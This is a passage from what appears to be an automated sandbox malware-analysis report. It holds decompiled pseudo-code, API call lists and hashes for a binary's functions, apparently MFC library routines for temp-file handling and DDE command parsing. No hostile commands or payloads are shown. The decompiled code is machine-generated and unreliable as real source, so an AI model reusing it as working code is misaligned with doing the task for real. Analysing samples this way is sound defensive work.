                  • _memcpy_s.LIBCMT ref: 0042B565
                    • Part of subcall function 00406436: __CxxThrowException@8.LIBCMT ref: 0040644C
                    • Part of subcall function 00406436: __EH_prolog3.LIBCMT ref: 00406459
                  • PathRemoveFileSpecW.SHLWAPI(00000000,00000000), ref: 0042B660
                  • GetProcAddress.KERNEL32(00000000,SHCreateItemFromParsingName), ref: 0042B73A
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: _strlen$H_prolog3$_memcpy_s$AddressException@8FilePathProcRemoveSpecThrow
                  • String ID: SHCreateItemFromParsingName$Shell32.dll
                  • API String ID: 515475663-214508289
                  • Opcode ID: afaa5c26efbec10f035749356761be0c0f4307d08cd13b05dcdb8681427ef078
                  • Instruction ID: 2d743887d1f872e1ac6e278da6c44de54668d799de1ddc935b4e9db1766ba105
                  • Opcode Fuzzy Hash: afaa5c26efbec10f035749356761be0c0f4307d08cd13b05dcdb8681427ef078
                  • Instruction Fuzzy Hash: B402F870A01226DFCB18DFA5D885ABFB7B4FF44315F54422EE421AB2E1DB389901CB94
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0041D7DD, Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 170timeCOMMON
                  Download Yara Rule
                  C-Code - Quality: 95%
                  			E0041D7DD(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				CHAR* _t74;
				int _t85;
				int _t90;
				void* _t101;
				CHAR* _t111;
				struct _SECURITY_DESCRIPTOR* _t125;
				void* _t142;
				CHAR** _t144;
				void* _t146;
				void* _t147;
				void* _t153;

				_t142 = __edx;
				_push(0x260);
				E00431B04(E0044BB39, __ebx, __edi, __esi);
				_t146 = __ecx;
				 *(_t147 - 0x244) =  *(_t147 + 8);
				_t144 = __ecx + 0x10;
				 *((intOrPtr*)(_t147 - 0x24c)) =  *((intOrPtr*)(_t147 + 0x10));
				E00401E30(_t144);
				_t125 = 0;
				 *((intOrPtr*)(_t147 - 0x23c)) = 0;
				 *((intOrPtr*)(_t147 - 0x238)) = 0;
				 *((intOrPtr*)(_t147 - 0x234)) = 0;
				 *((intOrPtr*)(_t147 - 0x230)) = 0;
				 *((intOrPtr*)(_t147 - 0x22c)) = 0;
				 *((intOrPtr*)(_t147 - 0x228)) = 0;
				if(( *(_t147 + 0xc) & 0x00001000) != 0) {
					_t101 = E0042E202(0, _t142,  *(_t147 - 0x244), _t147 - 0x23c);
					_t150 = _t101;
					if(_t101 != 0) {
						E004014C0(_t147 - 0x240, _t142);
						 *(_t147 - 4) = 0;
						E00428F81(0, _t150,  *(_t147 - 0x244), _t147 - 0x240);
						 *(_t147 - 0x248) = 0;
						if(GetDiskFreeSpaceA( *(_t147 - 0x240), _t147 - 0x25c, _t147 - 0x250, _t147 - 0x268, _t147 - 0x260) != 0) {
							 *(_t147 - 0x248) =  *(_t147 - 0x25c) *  *(_t147 - 0x250) *  *(_t147 - 0x268);
						}
						 *(_t147 - 0x258) = E00434200( *((intOrPtr*)(_t147 - 0x224)),  *((intOrPtr*)(_t147 - 0x220)), 2, _t125);
						_t111 =  *(_t147 - 0x248);
						asm("cdq");
						_t153 = _t142 - _t142;
						if(_t153 >= 0 && (_t153 > 0 || _t111 >  *(_t147 - 0x258))) {
							GetFullPathNameA( *(_t147 - 0x244), 0x104, _t147 - 0x114, _t147 - 0x248);
							 *( *(_t147 - 0x248)) = _t125;
							GetTempFileNameA(_t147 - 0x114, "MFC", _t125, E004014F0(_t144, 0x105));
							E0040A356(_t144, 0xffffffff);
						}
						 *(_t147 - 4) =  *(_t147 - 4) | 0xffffffff;
						E004010B0( *(_t147 - 0x240) + 0xfffffff0, _t142);
					}
				}
				_t74 =  *_t144;
				_t156 =  *((intOrPtr*)(_t74 - 0xc)) - _t125;
				if( *((intOrPtr*)(_t74 - 0xc)) == _t125 || E0042935A(_t146, _t142, _t156, _t74,  *(_t147 + 0xc),  *((intOrPtr*)(_t147 - 0x24c))) == 0) {
					E00401E30(_t144);
					E0042935A(_t146, _t142, __eflags,  *(_t147 - 0x244),  *(_t147 + 0xc),  *((intOrPtr*)(_t147 - 0x24c)));
				} else {
					_t131 = _t146 + 0xc;
					E00402CA0(_t146 + 0xc, _t146,  *(_t147 - 0x244));
					if(GetFileTime( *(_t146 + 4), _t147 - 0x264, _t147 - 0x26c, _t147 - 0x258) != 0) {
						E0042E37E(_t125, _t131, _t142, _t144, _t146, _t147 - 0x23c, _t147 - 0x264);
						SetFileTime( *(_t146 + 4), _t147 - 0x264, _t147 - 0x26c, _t147 - 0x258);
					}
					_t146 = GetFileSecurityA;
					 *(_t147 - 0x240) = _t125;
					_t85 = GetFileSecurityA( *(_t147 - 0x244), 4, _t125, _t125, _t147 - 0x240);
					_t159 = _t85;
					if(_t85 != 0) {
						_t125 = E00404461(_t159,  *(_t147 - 0x240));
						_t90 = GetFileSecurityA( *(_t147 - 0x244), 4, _t125,  *(_t147 - 0x240), _t147 - 0x240);
						_t160 = _t90;
						if(_t90 != 0) {
							SetFileSecurityA( *_t144, 4, _t125);
						}
						E00404490(_t125, _t144, _t146, _t160, _t125);
					}
				}
				return E00431B87(_t125, _t144, _t146);
			}














                  0x0041d7dd
                  0x0041d7dd
                  0x0041d7e7
                  0x0041d7ef
                  0x0041d7f1
                  0x0041d7fa
                  0x0041d7ff
                  0x0041d805
                  0x0041d80a
                  0x0041d813
                  0x0041d819
                  0x0041d81f
                  0x0041d825
                  0x0041d82b
                  0x0041d831
                  0x0041d837
                  0x0041d84a
                  0x0041d84f
                  0x0041d851
                  0x0041d85d
                  0x0041d86f
                  0x0041d872
                  0x0041d899
                  0x0041d8a7
                  0x0041d8bd
                  0x0041d8bd
                  0x0041d8d7
                  0x0041d8dd
                  0x0041d8e5
                  0x0041d8e6
                  0x0041d8e8
                  0x0041d90d
                  0x0041d920
                  0x0041d935
                  0x0041d93f
                  0x0041d93f
                  0x0041d94a
                  0x0041d951
                  0x0041d951
                  0x0041d851
                  0x0041d956
                  0x0041d958
                  0x0041d95b
                  0x0041da43
                  0x0041da59
                  0x0041d97a
                  0x0041d980
                  0x0041d983
                  0x0041d9a8
                  0x0041d9b8
                  0x0041d9d7
                  0x0041d9d7
                  0x0041d9dd
                  0x0041d9f4
                  0x0041d9fa
                  0x0041d9fc
                  0x0041d9fe
                  0x0041da0c
                  0x0041da24
                  0x0041da26
                  0x0041da28
                  0x0041da2f
                  0x0041da2f
                  0x0041da36
                  0x0041da3b
                  0x0041da3e
                  0x0041da63

                  APIs
                  • __EH_prolog3_GS.LIBCMT ref: 0041D7E7
                  • GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000260), ref: 0041D89F
                  • GetFullPathNameA.KERNEL32(?,00000104,?,?,?,?,00000002,00000000,?,?,?,00000260), ref: 0041D90D
                  • GetTempFileNameA.KERNEL32(?,MFC,00000000,00000000,00000105,?,?,?,00000260), ref: 0041D935
                  • GetFileTime.KERNEL32(?,?,?,?,?,?,?,?,00000260), ref: 0041D9A0
                  • SetFileTime.KERNEL32(?,?,?,?,?,?,?,00000260), ref: 0041D9D7
                  • GetFileSecurityA.ADVAPI32(?,00000004,00000000,00000000,?), ref: 0041D9FA
                  • GetFileSecurityA.ADVAPI32(?,00000004,00000000,?,?), ref: 0041DA24
                  • SetFileSecurityA.ADVAPI32(?,00000004,00000000), ref: 0041DA2F
                    • Part of subcall function 00428F81: _memset.LIBCMT ref: 00428F9C
                    • Part of subcall function 00428F81: PathStripToRootA.SHLWAPI(00000000,?,?,0041D5EC,?,?), ref: 00428FB1
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: File$Security$NamePathTime$DiskFreeFullH_prolog3_RootSpaceStripTemp_memset
                  • String ID: MFC
                  • API String ID: 40796375-3472178984
                  • Opcode ID: 2250a457610f27e5733e8c215d57b6ba1d7278de8302ce0a023aa894adcbcf46
                  • Instruction ID: 1d756b7bdd7ff3140dd47d20636a31886bf6137fab317b913ecda251622700a6
                  • Opcode Fuzzy Hash: 2250a457610f27e5733e8c215d57b6ba1d7278de8302ce0a023aa894adcbcf46
                  • Instruction Fuzzy Hash: 25612EB1900229ABDF21EF51CD89AEEB7B9FF48354F0041EAF519A6160DB359E84CF14
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00427FD5, Relevance: 16.2, APIs: 5, Strings: 4, Instructions: 480windowCOMMON
                  Download Yara Rule
                  C-Code - Quality: 96%
                  			E00427FD5(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t196;
				signed int _t197;
				void* _t200;
				signed int _t201;
				void* _t204;
				signed int _t205;
				intOrPtr _t209;
				void* _t215;
				void* _t220;
				void* _t227;
				intOrPtr _t231;
				void* _t236;
				void* _t247;
				void* _t260;
				intOrPtr _t261;
				void* _t267;
				intOrPtr _t270;
				void* _t272;
				void* _t279;
				intOrPtr _t284;
				void* _t290;
				intOrPtr _t293;
				void* _t295;
				void* _t302;
				intOrPtr _t307;
				void* _t313;
				void* _t316;
				void* _t318;
				void* _t325;
				signed int _t332;
				intOrPtr* _t335;
				void* _t337;
				void* _t374;
				void* _t378;
				intOrPtr* _t462;
				intOrPtr _t469;
				intOrPtr _t471;
				void* _t475;
				void* _t476;

				_t476 = __eflags;
				_t465 = __edx;
				_push(0x38);
				E00431A9B(E0044C50A, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t475 - 0x14)) = __ecx;
				_push( *((intOrPtr*)(_t475 + 8)));
				E00406039(__ebx, _t475 + 8, __edx, __edi, __esi, _t476);
				 *((intOrPtr*)(_t475 - 4)) = 0;
				E0041576C(_t475 - 0x44, _t476);
				 *((char*)(_t475 - 4)) = 1;
				 *((intOrPtr*)(_t475 - 0x30)) = 4;
				_t196 = E00427A29(_t475 + 8, _t475 - 0x18, 7);
				 *((char*)(_t475 - 4)) = 2;
				_t197 = E00409F00(_t196, __edx, "[open(\"");
				asm("sbb bl, bl");
				 *((char*)(_t475 - 4)) = 1;
				E004010B0( *((intOrPtr*)(_t475 - 0x18)) + 0xfffffff0, __edx);
				_t374 = _t475 + 8;
				if( ~_t197 + 1 == 0) {
					_t200 = E00427A29(_t374, _t475 - 0x18, 8);
					 *((char*)(_t475 - 4)) = 4;
					_t201 = E00409F00(_t200, __edx, "[print(\"");
					asm("sbb bl, bl");
					_t361 =  ~_t201 + 1;
					 *((char*)(_t475 - 4)) = 1;
					E004010B0( *((intOrPtr*)(_t475 - 0x18)) + 0xfffffff0, _t465);
					_t378 = _t475 + 8;
					__eflags =  ~_t201 + 1;
					if( ~_t201 + 1 == 0) {
						_t204 = E00427A29(_t378, _t475 - 0x18, 0xa);
						 *((char*)(_t475 - 4)) = 6;
						_t205 = E00409F00(_t204, _t465, "[printto(\"");
						asm("sbb bl, bl");
						_t361 =  ~_t205 + 1;
						 *((char*)(_t475 - 4)) = 1;
						E004010B0( *((intOrPtr*)(_t475 - 0x18)) + 0xfffffff0, _t465);
						__eflags =  ~_t205 + 1;
						if( ~_t205 + 1 == 0) {
							L33:
							 *((char*)(_t475 - 4)) = 0;
							E004157B0(_t475 - 0x44, _t465);
							E004010B0( *((intOrPtr*)(_t475 + 8)) + 0xfffffff0, _t465);
							_t209 = 0;
							__eflags = 0;
							L34:
							return E00431B73(_t209);
						}
						 *((intOrPtr*)(_t475 - 0x30)) = 3;
						__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t475 + 8)) - 0xc)) + 0xfffffff6;
						_t215 = E004279E1(_t475 + 8, _t475 - 0x18,  *((intOrPtr*)( *((intOrPtr*)(_t475 + 8)) - 0xc)) + 0xfffffff6);
						 *((char*)(_t475 - 4)) = 7;
						L6:
						E004056C2(_t361, _t475 + 8, _t215);
						 *((char*)(_t475 - 4)) = 1;
						E004010B0( *((intOrPtr*)(_t475 - 0x18)) + 0xfffffff0, _t465);
						_t469 = E0042784A(_t475 + 8, 0x22, 0);
						_t478 = _t469 - 0xffffffff;
						if(_t469 == 0xffffffff) {
							goto L33;
						}
						_t220 = E00427A29(_t475 + 8, _t475 - 0x18, _t469);
						 *((char*)(_t475 - 4)) = 8;
						E004056C2(_t361, _t475 - 0x2c, _t220);
						 *((char*)(_t475 - 4)) = 1;
						E004010B0( *((intOrPtr*)(_t475 - 0x18)) + 0xfffffff0, _t465);
						_t227 = E004279E1(_t475 + 8, _t475 - 0x18,  *((intOrPtr*)( *((intOrPtr*)(_t475 + 8)) - 0xc)) - _t469);
						 *((char*)(_t475 - 4)) = 9;
						E004056C2(_t361, _t475 + 8, _t227);
						 *((char*)(_t475 - 4)) = 1;
						E004010B0( *((intOrPtr*)(_t475 - 0x18)) + 0xfffffff0, _t465);
						 *((intOrPtr*)(_t475 - 0x18)) = 0;
						 *((intOrPtr*)(_t475 - 0x10)) = 1;
						_t231 =  *((intOrPtr*)(E0041F363(1, 0, _t469, _t478) + 4));
						_t479 =  *((intOrPtr*)(_t231 + 0x8c));
						if( *((intOrPtr*)(_t231 + 0x8c)) == 0) {
							 *((intOrPtr*)(_t475 - 0x18)) =  *((intOrPtr*)( *((intOrPtr*)(E0041F363(1, 0, _t469, __eflags) + 4)) + 0x8c));
						} else {
							_t469 =  *((intOrPtr*)(E0041F363(1, 0, _t469, _t479) + 4));
							 *((intOrPtr*)( *((intOrPtr*)(E0041F363(1, 0, _t469, _t479) + 4)) + 0x4c)) =  *((intOrPtr*)(_t469 + 0x8c));
							 *((intOrPtr*)( *((intOrPtr*)(E0041F363(1, 0, _t469, _t479) + 4)) + 0x8c)) = _t475 - 0x44;
						}
						_t480 =  *((intOrPtr*)(_t475 - 0x30)) - 1;
						if( *((intOrPtr*)(_t475 - 0x30)) != 1) {
							__eflags =  *((intOrPtr*)(_t475 - 0x30)) - 3;
							if( *((intOrPtr*)(_t475 - 0x30)) != 3) {
								L28:
								_t470 = E004274AF( *((intOrPtr*)(_t475 - 0x14)));
								_t236 = E0041F363(1, 0, _t470, __eflags);
								_t465 =  *((intOrPtr*)( *((intOrPtr*)(_t236 + 4))));
								_t366 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t236 + 4)))) + 0x88))( *((intOrPtr*)(_t475 - 0x2c)));
								 *((intOrPtr*)( *((intOrPtr*)(E0041F363(_t366, 0, _t470, __eflags) + 4)) + 0x8c)) = _t475 - 0x44;
								SendMessageA( *( *((intOrPtr*)( *((intOrPtr*)(E0041F363(_t366, 0, _t470, __eflags) + 4)) + 0x20)) + 0x20), 0x111, 0xe108, 0);
								 *((intOrPtr*)( *((intOrPtr*)(E0041F363(_t366, 0, _t470, __eflags) + 4)) + 0x8c)) = 0;
								_t247 = E004274AF( *((intOrPtr*)(_t475 - 0x14)));
								__eflags = _t247 - _t470;
								if(_t247 > _t470) {
									 *((intOrPtr*)( *_t366 + 0x7c))();
								}
								__eflags = E00423E24();
								if(__eflags == 0) {
									PostMessageA( *( *((intOrPtr*)( *((intOrPtr*)(E0041F363(_t366, 0, _t470, __eflags) + 4)) + 0x20)) + 0x20), 0x10, 0, 0);
								}
								goto L32;
							}
							_t260 = E00427A29(_t475 + 8, _t475 - 0x1c, 3);
							_t470 = 0x4542a8;
							_t261 = E0042787D(_t260, 0x4542a8);
							_t366 = _t261;
							E004010B0( *((intOrPtr*)(_t475 - 0x1c)) + 0xfffffff0, _t465);
							__eflags = _t261;
							if(__eflags == 0) {
								_t267 = E004279E1(_t475 + 8, _t475 - 0x1c,  *((intOrPtr*)( *((intOrPtr*)(_t475 + 8)) - 0xc)) + 0xfffffffd);
								 *((char*)(_t475 - 4)) = 0xa;
								E004056C2(_t366, _t475 + 8, _t267);
								 *((char*)(_t475 - 4)) = 1;
								E004010B0( *((intOrPtr*)(_t475 - 0x1c)) + 0xfffffff0, _t465);
								_t270 = E0042784A(_t475 + 8, 0x22, 0);
								_t366 = _t270;
								__eflags = _t270 - 0xffffffff;
								if(__eflags == 0) {
									goto L21;
								}
								_t272 = E00427A29(_t475 + 8, _t475 - 0x1c, _t366);
								 *((char*)(_t475 - 4)) = 0xb;
								E004056C2(_t366, _t475 - 0x28, _t272);
								 *((char*)(_t475 - 4)) = 1;
								E004010B0( *((intOrPtr*)(_t475 - 0x1c)) + 0xfffffff0, _t465);
								_t279 = E004279E1(_t475 + 8, _t475 - 0x1c,  *((intOrPtr*)( *((intOrPtr*)(_t475 + 8)) - 0xc)) - _t366);
								 *((char*)(_t475 - 4)) = 0xc;
								E004056C2(_t366, _t475 + 8, _t279);
								 *((char*)(_t475 - 4)) = 1;
								E004010B0( *((intOrPtr*)(_t475 - 0x1c)) + 0xfffffff0, _t465);
								_t284 = E0042787D(E00427A29(_t475 + 8, _t475 - 0x1c, 3), 0x4542a8);
								_t366 = _t284;
								E004010B0( *((intOrPtr*)(_t475 - 0x1c)) + 0xfffffff0, _t465);
								__eflags = _t284;
								if(__eflags != 0) {
									goto L21;
								}
								_t290 = E004279E1(_t475 + 8, _t475 - 0x1c,  *((intOrPtr*)( *((intOrPtr*)(_t475 + 8)) - 0xc)) + 0xfffffffd);
								 *((char*)(_t475 - 4)) = 0xd;
								E004056C2(_t366, _t475 + 8, _t290);
								 *((char*)(_t475 - 4)) = 1;
								E004010B0( *((intOrPtr*)(_t475 - 0x1c)) + 0xfffffff0, _t465);
								_t293 = E0042784A(_t475 + 8, 0x22, 0);
								_t366 = _t293;
								__eflags = _t293 - 0xffffffff;
								if(__eflags == 0) {
									goto L21;
								}
								_t295 = E00427A29(_t475 + 8, _t475 - 0x1c, _t366);
								 *((char*)(_t475 - 4)) = 0xe;
								E004056C2(_t366, _t475 - 0x24, _t295);
								 *((char*)(_t475 - 4)) = 1;
								E004010B0( *((intOrPtr*)(_t475 - 0x1c)) + 0xfffffff0, _t465);
								_t302 = E004279E1(_t475 + 8, _t475 - 0x1c,  *((intOrPtr*)( *((intOrPtr*)(_t475 + 8)) - 0xc)) - _t366);
								 *((char*)(_t475 - 4)) = 0xf;
								E004056C2(_t366, _t475 + 8, _t302);
								 *((char*)(_t475 - 4)) = 1;
								E004010B0( *((intOrPtr*)(_t475 - 0x1c)) + 0xfffffff0, _t465);
								_t307 = E0042787D(E00427A29(_t475 + 8, _t475 - 0x1c, 3), 0x4542a8);
								_t366 = _t307;
								E004010B0( *((intOrPtr*)(_t475 - 0x1c)) + 0xfffffff0, _t465);
								__eflags = _t307;
								if(__eflags != 0) {
									goto L21;
								}
								_t313 = E004279E1(_t475 + 8, _t475 - 0x1c,  *((intOrPtr*)( *((intOrPtr*)(_t475 + 8)) - 0xc)) + 0xfffffffd);
								 *((char*)(_t475 - 4)) = 0x10;
								E004056C2(_t366, _t475 + 8, _t313);
								 *((char*)(_t475 - 4)) = 1;
								E004010B0( *((intOrPtr*)(_t475 - 0x1c)) + 0xfffffff0, _t465);
								_t316 = E0042784A(_t475 + 8, 0x22, 0);
								_t470 = _t316;
								__eflags = _t316 - 0xffffffff;
								if(__eflags == 0) {
									goto L21;
								}
								_t318 = E00427A29(_t475 + 8, _t475 - 0x1c, _t470);
								 *((char*)(_t475 - 4)) = 0x11;
								E004056C2(_t366, _t475 - 0x20, _t318);
								 *((char*)(_t475 - 4)) = 1;
								E004010B0( *((intOrPtr*)(_t475 - 0x1c)) + 0xfffffff0, _t465);
								_t325 = E004279E1(_t475 + 8, _t475 - 0x1c,  *((intOrPtr*)( *((intOrPtr*)(_t475 + 8)) - 0xc)) - _t470);
								 *((char*)(_t475 - 4)) = 0x12;
								E004056C2(_t366, _t475 + 8, _t325);
								__eflags =  *((intOrPtr*)(_t475 - 0x1c)) + 0xfffffff0;
								 *((char*)(_t475 - 4)) = 1;
								E004010B0( *((intOrPtr*)(_t475 - 0x1c)) + 0xfffffff0, _t465);
								goto L28;
							}
							L21:
							 *((intOrPtr*)(_t475 - 0x10)) = 0;
							goto L32;
						} else {
							_t366 =  *((intOrPtr*)( *((intOrPtr*)(E0041F363(1, 0, _t469, _t480) + 4)) + 0x20));
							_t471 =  *((intOrPtr*)( *((intOrPtr*)(E0041F363(_t366, 0, _t469, _t480) + 4)) + 0x4c));
							if(_t471 == 0xffffffff || _t471 == 1) {
								_t332 = IsIconic( *(_t366 + 0x20));
								asm("sbb esi, esi");
								_t470 = ( ~_t332 & 0x00000004) + 5;
							}
							E00412C34(_t366, _t470);
							_t484 = _t470 - 6;
							if(_t470 != 6) {
								SetForegroundWindow( *(_t366 + 0x20));
							}
							_t335 =  *((intOrPtr*)(E0041F363(_t366, 0, _t470, _t484) + 4));
							_t465 =  *_t335;
							_t462 = _t335;
							 *((intOrPtr*)( *_t335 + 0x88))( *((intOrPtr*)(_t475 - 0x2c)));
							_t337 = E00423E24();
							_t485 = _t337;
							if(_t337 == 0) {
								E00423E10(_t462, 1);
							}
							 *( *((intOrPtr*)(E0041F363(_t366, 0, _t470, _t485) + 4)) + 0x4c) =  *( *((intOrPtr*)(E0041F363(_t366, 0, _t470, _t485) + 4)) + 0x4c) | 0xffffffff;
							L32:
							 *((intOrPtr*)( *((intOrPtr*)(E0041F363(_t366, 0, _t470, _t485) + 4)) + 0x8c)) =  *((intOrPtr*)(_t475 - 0x18));
							 *((char*)(_t475 - 4)) = 0;
							E004157B0(_t475 - 0x44, _t465);
							E004010B0( *((intOrPtr*)(_t475 + 8)) + 0xfffffff0, _t465);
							_t209 =  *((intOrPtr*)(_t475 - 0x10));
							goto L34;
						}
					}
					 *((intOrPtr*)(_t475 - 0x30)) = 2;
					_t215 = E004279E1(_t378, _t475 - 0x18,  *((intOrPtr*)( *((intOrPtr*)(_t475 + 8)) - 0xc)) + 0xfffffff8);
					 *((char*)(_t475 - 4)) = 5;
					goto L6;
				}
				 *((intOrPtr*)(_t475 - 0x30)) = 1;
				_t215 = E004279E1(_t374, _t475 - 0x18,  *((intOrPtr*)( *((intOrPtr*)(_t475 + 8)) - 0xc)) + 0xfffffff9);
				 *((char*)(_t475 - 4)) = 3;
				goto L6;
			}










































                  0x00427fd5
                  0x00427fd5
                  0x00427fd5
                  0x00427fdc
                  0x00427fe1
                  0x00427fe4
                  0x00427fea
                  0x00427ff4
                  0x00427ff7
                  0x00428005
                  0x00428009
                  0x00428010
                  0x0042801c
                  0x00428020
                  0x0042802c
                  0x00428033
                  0x00428037
                  0x0042803c
                  0x00428041
                  0x0042806c
                  0x00428078
                  0x0042807c
                  0x00428088
                  0x0042808d
                  0x0042808f
                  0x00428093
                  0x00428098
                  0x0042809b
                  0x0042809d
                  0x004280c5
                  0x004280d1
                  0x004280d5
                  0x004280e1
                  0x004280e6
                  0x004280e8
                  0x004280ec
                  0x004280f1
                  0x004280f3
                  0x004285bb
                  0x004285be
                  0x004285c2
                  0x004285cd
                  0x004285d2
                  0x004285d2
                  0x004285d4
                  0x004285d9
                  0x004285d9
                  0x004280fc
                  0x00428106
                  0x00428111
                  0x00428116
                  0x0042811a
                  0x0042811e
                  0x00428129
                  0x0042812d
                  0x0042813d
                  0x0042813f
                  0x00428142
                  0x00000000
                  0x00000000
                  0x00428150
                  0x00428159
                  0x0042815d
                  0x00428168
                  0x0042816c
                  0x00428181
                  0x0042818a
                  0x0042818e
                  0x00428199
                  0x0042819d
                  0x004281a5
                  0x004281a8
                  0x004281b0
                  0x004281b3
                  0x004281b9
                  0x004281f5
                  0x004281bb
                  0x004281c0
                  0x004281d1
                  0x004281df
                  0x004281df
                  0x004281f8
                  0x004281fb
                  0x00428282
                  0x00428286
                  0x004284fb
                  0x00428503
                  0x00428505
                  0x00428510
                  0x0042851a
                  0x00428527
                  0x00428546
                  0x00428557
                  0x0042855d
                  0x00428562
                  0x00428564
                  0x0042856a
                  0x0042856a
                  0x00428572
                  0x00428574
                  0x00428588
                  0x00428588
                  0x00000000
                  0x00428574
                  0x00428295
                  0x0042829a
                  0x004282a1
                  0x004282ae
                  0x004282b0
                  0x004282b5
                  0x004282b7
                  0x004282d2
                  0x004282db
                  0x004282df
                  0x004282ea
                  0x004282ee
                  0x004282f9
                  0x004282fe
                  0x00428300
                  0x00428303
                  0x00000000
                  0x00000000
                  0x0042830d
                  0x00428316
                  0x0042831a
                  0x00428325
                  0x00428329
                  0x0042833e
                  0x00428347
                  0x0042834b
                  0x00428356
                  0x0042835a
                  0x0042836f
                  0x0042837c
                  0x0042837e
                  0x00428383
                  0x00428385
                  0x00000000
                  0x00000000
                  0x0042839c
                  0x004283a5
                  0x004283a9
                  0x004283b4
                  0x004283b8
                  0x004283c3
                  0x004283c8
                  0x004283ca
                  0x004283cd
                  0x00000000
                  0x00000000
                  0x004283db
                  0x004283e4
                  0x004283e8
                  0x004283f3
                  0x004283f7
                  0x0042840c
                  0x00428415
                  0x00428419
                  0x00428424
                  0x00428428
                  0x0042843d
                  0x0042844a
                  0x0042844c
                  0x00428451
                  0x00428453
                  0x00000000
                  0x00000000
                  0x0042846a
                  0x00428473
                  0x00428477
                  0x00428482
                  0x00428486
                  0x00428491
                  0x00428496
                  0x00428498
                  0x0042849b
                  0x00000000
                  0x00000000
                  0x004284a9
                  0x004284b2
                  0x004284b6
                  0x004284c1
                  0x004284c5
                  0x004284da
                  0x004284e3
                  0x004284e7
                  0x004284ef
                  0x004284f2
                  0x004284f6
                  0x00000000
                  0x004284f6
                  0x004282b9
                  0x004282b9
                  0x00000000
                  0x00428201
                  0x00428209
                  0x00428214
                  0x0042821a
                  0x00428224
                  0x0042822e
                  0x00428233
                  0x00428233
                  0x00428239
                  0x0042823e
                  0x00428241
                  0x00428246
                  0x00428246
                  0x00428251
                  0x00428257
                  0x00428259
                  0x0042825b
                  0x00428261
                  0x00428266
                  0x00428268
                  0x0042826c
                  0x0042826c
                  0x00428279
                  0x0042858e
                  0x00428599
                  0x004285a2
                  0x004285a6
                  0x004285b1
                  0x004285b6
                  0x00000000
                  0x004285b6
                  0x004281fb
                  0x004280a2
                  0x004280b4
                  0x004280b9
                  0x00000000
                  0x004280b9
                  0x00428046
                  0x00428058
                  0x0042805d
                  0x00000000

                  APIs
                  • __EH_prolog3.LIBCMT ref: 00427FDC
                    • Part of subcall function 00406039: __EH_prolog3.LIBCMT ref: 00406040
                  • IsIconic.USER32 ref: 00428224
                  • SetForegroundWindow.USER32(?,-00000005,?,?,?,?,?,?,?,?,?,?,00000007,?,00000038), ref: 00428246
                  • SendMessageA.USER32(?,00000111,0000E108,00000000), ref: 00428546
                  • PostMessageA.USER32 ref: 00428588
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: H_prolog3Message$ForegroundIconicPostSendWindow
                  • String ID: ","$[open("$[print("$[printto("
                  • API String ID: 2890980707-3790869113
                  • Opcode ID: 346ce8cee2bd3e896c27535d90984726f0a43def55bf19995bbae6884d5c5d6f
                  • Instruction ID: 10cd29f604f9e594cf7a41b93c8c31365955eb4dae2b5264998e721e2426469d
                  • Opcode Fuzzy Hash: 346ce8cee2bd3e896c27535d90984726f0a43def55bf19995bbae6884d5c5d6f
                  • Instruction Fuzzy Hash: DE12C630A00158EFCB04EBA5C895FEE7BB4AF04318F04825EB9556B3D2DF789A45CB95
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0042B11B, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 173comCOMMON
                  Download Yara Rule
                  C-Code - Quality: 65%
                  			E0042B11B(void* __ebx, intOrPtr __ecx, void* __edx, struct _OSVERSIONINFOA __edi, void* __esi, void* __eflags) {
				intOrPtr _t87;
				signed int _t89;
				void* _t99;
				intOrPtr _t101;
				void* _t104;
				intOrPtr* _t105;
				void* _t106;
				intOrPtr* _t107;
				char* _t114;
				intOrPtr _t115;
				signed int _t119;
				void* _t126;
				char* _t127;
				signed char _t128;
				intOrPtr _t146;
				void* _t147;
				void* _t148;
				signed int _t157;

				_t143 = __edi;
				_t136 = __edx;
				_push(0xac);
				E00431B04(E0044C739, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t147 - 0xb0)) =  *((intOrPtr*)(_t147 + 0x10));
				 *((intOrPtr*)(_t147 - 0xac)) =  *((intOrPtr*)(_t147 + 0x18));
				_t146 = __ecx;
